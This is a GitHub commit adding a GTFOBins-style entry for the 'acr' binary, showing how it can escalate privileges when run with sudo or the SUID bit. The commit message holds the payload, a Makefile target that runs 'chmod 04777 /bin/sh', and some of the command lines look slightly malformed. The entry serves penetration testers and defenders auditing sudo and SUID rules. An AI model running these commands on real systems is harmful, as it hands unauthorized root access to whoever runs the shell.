Create acr.md

Inside the Makefile :
privesc: 
chmod 04777 /bin/sh

But there is another possibilities, the command above is how i did it
This commit is contained in:
Albert Llimós 2024-05-02 14:18:58 +02:00 committed by GitHub
parent 97f46f1526
commit 15eb4b376a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

15
_gtfobins/acr.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
suid:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
./acr -r Makefile
sudo:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
sudo acr -r Makefile
---